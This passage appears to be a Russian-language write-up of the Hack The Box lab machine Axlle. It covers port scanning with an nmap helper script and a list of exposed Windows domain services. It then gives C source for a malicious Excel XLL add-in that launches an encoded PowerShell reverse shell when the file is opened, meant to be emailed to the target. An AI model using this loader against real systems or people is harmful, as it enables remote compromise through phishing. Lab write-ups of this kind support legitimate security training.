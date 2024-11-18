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Наша цель — получение прав суперпользователя на машине Axlle с учебной площадки Hack The Box. Уровень задания — сложный.
warning
Подключаться к машинам с HTB рекомендуется только через VPN. Не делай этого с компьютеров, где есть важные для тебя данные, так как ты окажешься в общей сети с другими участниками.
Разведка
Сканирование портов
Добавляем IP-адрес машины в
/:
10.10.11.21 axlle.htb
И запускаем сканирование портов.
Справка: сканирование портов
Сканирование портов — стандартный первый шаг при любой атаке. Он позволяет атакующему узнать, какие службы на хосте принимают соединение. На основе этой информации выбирается следующий шаг к получению точки входа.
Наиболее известный инструмент для сканирования — это Nmap. Улучшить результаты его работы ты можешь при помощи следующего скрипта:
#!/bin/bashports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)nmap -p$ports -A $1
Он действует в два этапа. На первом производится обычное быстрое сканирование, на втором — более тщательное сканирование, с использованием имеющихся скриптов (опция
-A).
Сканер нашел множество открытых портов:
- 80 (HTTP) — веб‑сервер Microsoft IIS/10.0;
- 88 — Kerberos;
- 135 — Microsoft RPC;
- 139 — служба сеансов NetBIOS, NetLogon;
- 389 — LDAP;
- 445 — SMB;
- 464 — служба смены пароля Kerberos;
- 593 (HTTP-RPC-EPMAP) — используется в службах DCOM и MS Exchange;
- 636 — LDAP с шифрованием SSL или TLS;
- 3268 (LDAP) — для доступа к Global Catalog от клиента к контроллеру;
- 3269 (LDAPS) — для доступа к Global Catalog от клиента к контроллеру через защищенное соединение;
- 5985 — служба удаленного управления WinRM.
SMB ничего не возвращает, а чтобы попытаться войти на почтовый сервер, хорошо бы найти почты. Так что для начала давай посмотрим на сайт.
Точка опоры
На главной странице находим сообщение, что есть возможность отправить файл в формате Excel на адрес
accounts@axlle.. Также в сообщении указано, что выполнение макросов отключено.
Хоть макросы и заблокированы, Excel все равно позволяет выполнить код — при открытии специальной библиотеки Excel DLL в формате XLL. Напишем код такой библиотеки, который будет запускать реверс‑шелл на PowerShell. Сгенерировать его можно на сайте revshells.com.
#include <windows.h>__declspec(dllexport) void __cdecl xlAutoOpen(void);void __cdecl xlAutoOpen() { WinExec("powershell -e JABjAGwA....ApAA==", 1);}BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ){ switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE;}
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